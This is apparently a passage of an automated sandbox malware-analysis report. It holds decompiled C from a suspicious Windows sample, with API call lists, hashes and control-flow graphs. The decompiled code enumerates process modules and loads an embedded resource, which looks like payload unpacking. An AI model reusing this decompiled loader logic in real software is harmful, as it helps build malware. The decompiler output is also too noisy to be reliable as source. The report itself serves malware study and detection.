                                                                        												E00401870(_t563 + 0x44, _t552, "_._");
                                                                        												_t539 = __imp__#8;
                                                                        												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                        												 *_t539(_t563 + 0x94);
                                                                        												E00401870(_t563 + 0x3c, _t552, "___");
                                                                        												 *_t539(_t563 + 0xa4);
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                        												_t542 =  *(_t563 + 0x58);
                                                                        												__eflags = _t542;
                                                                        												if(_t542 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                        												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                        												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                        												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                        												_t543 = _t396;
                                                                        												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                        												__imp__#23(_t543, _t563 + 0x48);
                                                                        												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                        												_t564 = _t563 + 0xc;
                                                                        												__imp__#24(_t543);
                                                                        												_t399 =  *(_t564 + 0x54);
                                                                        												__eflags = _t399;
                                                                        												if(_t399 == 0) {
                                                                        													_t399 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                        												__eflags = _t543;
                                                                        												if(_t543 != 0) {
                                                                        													__imp__#16(_t543); // executed
                                                                        												}
                                                                        												_t402 =  *(_t564 + 0x34);
                                                                        												__eflags = _t402;
                                                                        												if(_t402 == 0) {
                                                                        													_t402 = E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t469 =  *(_t564 + 0x40);
                                                                        												_t555 = _t402;
                                                                        												__eflags = _t469;
                                                                        												if(_t469 == 0) {
                                                                        													_t531 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t531 =  *_t469;
                                                                        												}
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                        												__imp__#411(0xc, 0, 0);
                                                                        												_t471 =  *(_t564 + 0x3c);
                                                                        												__eflags = _t471;
                                                                        												if(_t471 == 0) {
                                                                        													E0040AD90(0x80004003);
                                                                        												}
                                                                        												_t405 =  *(_t564 + 0x38);
                                                                        												__eflags = _t405;
                                                                        												if(_t405 == 0) {
                                                                        													_t514 = 0;
                                                                        													__eflags = 0;
                                                                        												} else {
                                                                        													_t514 =  *_t405;
                                                                        												}
                                                                        												_t563 = _t564 - 0x10;
                                                                        												_t407 = _t563;
                                                                        												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                        												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                        												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                        												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                        												_t538 = __imp__#9; // 0x77b5cf00
                                                                        												_t538->i(_t563 + 0xa4);
                                                                        												E004019A0(_t563 + 0x38);
                                                                        												_t538->i(_t563 + 0x94);
                                                                        												_t413 =  *(_t563 + 0x3c);
                                                                        												__eflags = _t413;
                                                                        												if(_t413 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                        												}
                                                                        												E004019A0(_t563 + 0x40);
                                                                        												_t415 =  *(_t563 + 0x34);
                                                                        												__eflags = _t415;
                                                                        												if(_t415 != 0) {
                                                                        													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                        									__eflags = _t379 - _t563 + 0x178;
                                                                        									if(__eflags != 0) {
                                                                        										_push(_t379);
                                                                        										E0040B6B5(0, _t528, _t538, __eflags);
                                                                        										_t563 = _t563 + 4;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t369 =  *(_t563 + 0x54);
                                                                        							__eflags = _t369;
                                                                        							if(_t369 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                        							}
                                                                        							_t370 =  *(_t563 + 0x58);
                                                                        							__eflags = _t370;
                                                                        							if(_t370 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                        							}
                                                                        						}
                                                                        						goto L80;
                                                                        					} else {
                                                                        						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        						_t565 = _t557 + 8;
                                                                        						_t547 = _t428;
                                                                        						_t520 = _t565 + 0x298;
                                                                        						while(1) {
                                                                        							_t429 =  *_t520;
                                                                        							if(_t429 !=  *_t547) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t429 == 0) {
                                                                        								L7:
                                                                        								_t429 = 0;
                                                                        							} else {
                                                                        								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                        								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                        									break;
                                                                        								} else {
                                                                        									_t520 = _t520 + 2;
                                                                        									_t547 = _t547 + 2;
                                                                        									if(_t493 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L7;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							L9:
                                                                        							if(_t429 != 0) {
                                                                        								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                        								_t557 = _t565 + 8;
                                                                        								_t548 = _t431;
                                                                        								_t488 = _t557 + 0x298;
                                                                        								while(1) {
                                                                        									_t432 =  *_t488;
                                                                        									__eflags = _t432 -  *_t548;
                                                                        									if(_t432 !=  *_t548) {
                                                                        										break;
                                                                        									}
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										L16:
                                                                        										_t432 = 0;
                                                                        									} else {
                                                                        										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                        										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                        										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                        											break;
                                                                        										} else {
                                                                        											_t488 = _t488 + 2;
                                                                        											_t548 = _t548 + 2;
                                                                        											__eflags = _t432;
                                                                        											if(_t432 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L16;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									L18:
                                                                        									__eflags = _t432;
                                                                        									if(_t432 == 0) {
                                                                        										goto L10;
                                                                        									} else {
                                                                        										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                        										__eflags = _t435;
                                                                        										if(_t435 != 0) {
                                                                        											do {
                                                                        												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                        												_t566 = _t557 + 8;
                                                                        												_t549 = _t437;
                                                                        												_t490 = _t566 + 0x298;
                                                                        												while(1) {
                                                                        													_t438 =  *_t490;
                                                                        													__eflags = _t438 -  *_t549;
                                                                        													if(_t438 !=  *_t549) {
                                                                        														break;
                                                                        													}
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														L26:
                                                                        														_t438 = 0;
                                                                        													} else {
                                                                        														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                        														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                        														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                        															break;
                                                                        														} else {
                                                                        															_t490 = _t490 + 2;
                                                                        															_t549 = _t549 + 2;
                                                                        															__eflags = _t438;
                                                                        															if(_t438 != 0) {
                                                                        																continue;
                                                                        															} else {
                                                                        																goto L26;
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        													L28:
                                                                        													__eflags = _t438;
                                                                        													if(_t438 == 0) {
                                                                        														goto L10;
                                                                        													} else {
                                                                        														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                        														_t557 = _t566 + 8;
                                                                        														_t550 = _t439;
                                                                        														_t492 = _t557 + 0x298;
                                                                        														while(1) {
                                                                        															_t440 =  *_t492;
                                                                        															__eflags = _t440 -  *_t550;
                                                                        															if(_t440 !=  *_t550) {
                                                                        																break;
                                                                        															}
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																L34:
                                                                        																_t440 = 0;
                                                                        															} else {
                                                                        																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                        																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                        																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                        																	break;
                                                                        																} else {
                                                                        																	_t492 = _t492 + 2;
                                                                        																	_t550 = _t550 + 2;
                                                                        																	__eflags = _t440;
                                                                        																	if(_t440 != 0) {
                                                                        																		continue;
                                                                        																	} else {
                                                                        																		goto L34;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															L36:
                                                                        															__eflags = _t440;
                                                                        															if(_t440 == 0) {
                                                                        																goto L10;
                                                                        															} else {
                                                                        																goto L37;
                                                                        															}
                                                                        															goto L81;
                                                                        														}
                                                                        														asm("sbb eax, eax");
                                                                        														asm("sbb eax, 0xffffffff");
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L81;
                                                                        												}
                                                                        												asm("sbb eax, eax");
                                                                        												asm("sbb eax, 0xffffffff");
                                                                        												goto L28;
                                                                        												L37:
                                                                        												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                        												__eflags = _t442;
                                                                        											} while (_t442 != 0);
                                                                        										}
                                                                        										goto L38;
                                                                        									}
                                                                        									goto L81;
                                                                        								}
                                                                        								asm("sbb eax, eax");
                                                                        								asm("sbb eax, 0xffffffff");
                                                                        								goto L18;
                                                                        							} else {
                                                                        								L10:
                                                                        								CloseHandle(_t525);
                                                                        								return 0;
                                                                        							}
                                                                        							goto L81;
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						asm("sbb eax, 0xffffffff");
                                                                        						goto L9;
                                                                        					}
                                                                        				}
                                                                        				L81:
                                                                        			}

                                                                        0x004023b6
                                                                        0x004023b6
                                                                        0x004023ce
                                                                        0x004023d1
                                                                        0x004023d3
                                                                        0x004023dd
                                                                        0x004023ec
                                                                        0x004023ef
                                                                        0x004023fe
                                                                        0x00402401
                                                                        0x00402403
                                                                        0x00402411
                                                                        0x00402417
                                                                        0x00402424
                                                                        0x00402426
                                                                        0x0040242a
                                                                        0x0040242c
                                                                        0x00402434
                                                                        0x00402434
                                                                        0x0040243a
                                                                        0x0040243f
                                                                        0x00402443
                                                                        0x00402445
                                                                        0x0040244d
                                                                        0x0040244d
                                                                        0x00402445
                                                                        0x00402251
                                                                        0x0040223d
                                                                        0x0040244f
                                                                        0x0040245d
                                                                        0x0040245f
                                                                        0x00402461
                                                                        0x00402462
                                                                        0x00402467
                                                                        0x00402467
                                                                        0x0040245f
                                                                        0x004021ca
                                                                        0x0040246a
                                                                        0x0040246e
                                                                        0x00402470
                                                                        0x00402478
                                                                        0x00402478
                                                                        0x0040247a
                                                                        0x0040247e
                                                                        0x00402480
                                                                        0x00402488
                                                                        0x00402488
                                                                        0x00402480
                                                                        0x00000000
                                                                        0x00401c55
                                                                        0x00401c62
                                                                        0x00401c67
                                                                        0x00401c6a
                                                                        0x00401c6c
                                                                        0x00401c73
                                                                        0x00401c73
                                                                        0x00401c77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c7b
                                                                        0x00401c8f
                                                                        0x00401c8f
                                                                        0x00401c7d
                                                                        0x00401c7d
                                                                        0x00401c83
                                                                        0x00000000
                                                                        0x00401c85
                                                                        0x00401c85
                                                                        0x00401c88
                                                                        0x00401c8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401c8d
                                                                        0x00401c83
                                                                        0x00401c98
                                                                        0x00401c9a
                                                                        0x00401cbd
                                                                        0x00401cc2
                                                                        0x00401cc5
                                                                        0x00401cc7
                                                                        0x00401cd0
                                                                        0x00401cd0
                                                                        0x00401cd2
                                                                        0x00401cd4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cd6
                                                                        0x00401cd8
                                                                        0x00401cec
                                                                        0x00401cec
                                                                        0x00401cda
                                                                        0x00401cda
                                                                        0x00401cdd
                                                                        0x00401ce0
                                                                        0x00000000
                                                                        0x00401ce2
                                                                        0x00401ce2
                                                                        0x00401ce5
                                                                        0x00401ce8
                                                                        0x00401cea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401cea
                                                                        0x00401ce0
                                                                        0x00401cf5
                                                                        0x00401cf5
                                                                        0x00401cf7
                                                                        0x00000000
                                                                        0x00401cf9
                                                                        0x00401d02
                                                                        0x00401d07
                                                                        0x00401d09
                                                                        0x00401d10
                                                                        0x00401d1d
                                                                        0x00401d22
                                                                        0x00401d25
                                                                        0x00401d27
                                                                        0x00401d30
                                                                        0x00401d30
                                                                        0x00401d32
                                                                        0x00401d34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d36
                                                                        0x00401d38
                                                                        0x00401d4c
                                                                        0x00401d4c
                                                                        0x00401d3a
                                                                        0x00401d3a
                                                                        0x00401d3d
                                                                        0x00401d40
                                                                        0x00000000
                                                                        0x00401d42
                                                                        0x00401d42
                                                                        0x00401d45
                                                                        0x00401d48
                                                                        0x00401d4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d4a
                                                                        0x00401d40
                                                                        0x00401d55
                                                                        0x00401d55
                                                                        0x00401d57
                                                                        0x00000000
                                                                        0x00401d5d
                                                                        0x00401d6a
                                                                        0x00401d6f
                                                                        0x00401d72
                                                                        0x00401d74
                                                                        0x00401d80
                                                                        0x00401d80
                                                                        0x00401d82
                                                                        0x00401d84
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d86
                                                                        0x00401d88
                                                                        0x00401d9c
                                                                        0x00401d9c
                                                                        0x00401d8a
                                                                        0x00401d8a
                                                                        0x00401d8d
                                                                        0x00401d90
                                                                        0x00000000
                                                                        0x00401d92
                                                                        0x00401d92
                                                                        0x00401d95
                                                                        0x00401d98
                                                                        0x00401d9a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401d9a
                                                                        0x00401d90
                                                                        0x00401da5
                                                                        0x00401da5
                                                                        0x00401da7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401da7
                                                                        0x00401da0
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401da2
                                                                        0x00000000
                                                                        0x00401d57
                                                                        0x00401d50
                                                                        0x00401d52
                                                                        0x00000000
                                                                        0x00401dad
                                                                        0x00401db6
                                                                        0x00401dbb
                                                                        0x00401dbb
                                                                        0x00401d10
                                                                        0x00000000
                                                                        0x00401d09
                                                                        0x00000000
                                                                        0x00401cf7
                                                                        0x00401cf0
                                                                        0x00401cf2
                                                                        0x00000000
                                                                        0x00401c9c
                                                                        0x00401c9c
                                                                        0x00401c9d
                                                                        0x00401caf
                                                                        0x00401caf
                                                                        0x00000000
                                                                        0x00401c9a
                                                                        0x00401c93
                                                                        0x00401c95
                                                                        0x00000000
                                                                        0x00401c95
                                                                        0x00401c4f
                                                                        0x00000000

                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                        • Module32Next.KERNEL32 ref: 00401D02
                                                                        • Module32Next.KERNEL32 ref: 00401DB6
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPBs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                        • API String ID: 2366190142-533690119
                                                                        • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                        • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                        C-Code - Quality: 84%
                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t12;
                                                                        				void* _t21;
                                                                        				int _t25;
                                                                        				void* _t30;
                                                                        				int _t32;
                                                                        				char* _t35;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t35 = _a4;
                                                                        				_t17 = __ecx;
                                                                        				if(_t35 != 0) {
                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                        					asm("sbb esi, esi");
                                                                        					_t30 =  ~_t12 + 1;
                                                                        					if(_t30 != 0) {
                                                                        						_t12 = GetLastError();
                                                                        						if(_t12 == 0x7a) {
                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                        							asm("sbb esi, esi");
                                                                        							_t30 =  ~_t12 + 1;
                                                                        						}
                                                                        						if(_t30 != 0) {
                                                                        							_t12 = E00401030();
                                                                        						}
                                                                        					}
                                                                        					return _t12;
                                                                        				} else {
                                                                        					 *__ecx = _t35;
                                                                        					return __eax;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3322701435-0
                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                                        C-Code - Quality: 63%
                                                                        			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                        				signed int _v4;
                                                                        				signed int _v16;
                                                                        				signed int _v40;
                                                                        				void* _t14;
                                                                        				signed int _t15;
                                                                        				intOrPtr* _t21;
                                                                        				signed int _t24;
                                                                        				void* _t28;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				signed int _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t51;
                                                                        
                                                                        				_t40 = __edi;
                                                                        				_t28 = __ebx;
                                                                        				_t45 = _t51;
                                                                        				while(1) {
                                                                        					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t15 = E0040D2E3(_a4);
                                                                        					__eflags = _t15;
                                                                        					if(_t15 == 0) {
                                                                        						__eflags =  *0x423490 & 0x00000001;
                                                                        						if(( *0x423490 & 0x00000001) == 0) {
                                                                        							 *0x423490 =  *0x423490 | 0x00000001;
                                                                        							__eflags =  *0x423490;
                                                                        							E0040AEFC(0x423484);
                                                                        							E0040D2BD( *0x423490, 0x41a704);
                                                                        						}
                                                                        						E0040AF49( &_v16, 0x423484);
                                                                        						E0040CD39( &_v16, 0x420fa4);
                                                                        						asm("int3");
                                                                        						_t47 = _t45;
                                                                        						_push(_t47);
                                                                        						_push(0xc);
                                                                        						_push(0x420ff8);
                                                                        						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                        						_t42 = _v4;
                                                                        						__eflags = _t42;
                                                                        						if(_t42 != 0) {
                                                                        							__eflags =  *0x4250b0 - 3;
                                                                        							if( *0x4250b0 != 3) {
                                                                        								_push(_t42);
                                                                        								goto L16;
                                                                        							} else {
                                                                        								E0040D6E0(_t28, 4);
                                                                        								_v16 = _v16 & 0x00000000;
                                                                        								_t24 = E0040D713(_t42);
                                                                        								_v40 = _t24;
                                                                        								__eflags = _t24;
                                                                        								if(_t24 != 0) {
                                                                        									_push(_t42);
                                                                        									_push(_t24);
                                                                        									E0040D743();
                                                                        								}
                                                                        								_v16 = 0xfffffffe;
                                                                        								_t19 = E0040B70B();
                                                                        								__eflags = _v40;
                                                                        								if(_v40 == 0) {
                                                                        									_push(_v4);
                                                                        									L16:
                                                                        									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                        									if(__eflags == 0) {
                                                                        										_t21 = E0040BFC1(__eflags);
                                                                        										 *_t21 = E0040BF7F(GetLastError());
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return E0040E21D(_t19);
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        					L19:
                                                                        				}
                                                                        				return _t14;
                                                                        				goto L19;
                                                                        			}


















                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1411284514-0
                                                                        • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                        • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 188 40e7ee-40e7f6 call 40e7c3 190 40e7fb-40e7ff ExitProcess 188->190
                                                                        C-Code - Quality: 100%
                                                                        			E0040E7EE(int _a4) {
                                                                        
                                                                        				E0040E7C3(_a4); // executed
                                                                        				ExitProcess(_a4);
                                                                        			}



                                                                        0x0040e7f6
                                                                        0x0040e7ff

                                                                        APIs
                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                        • String ID:
                                                                        • API String ID: 2427264223-0
                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
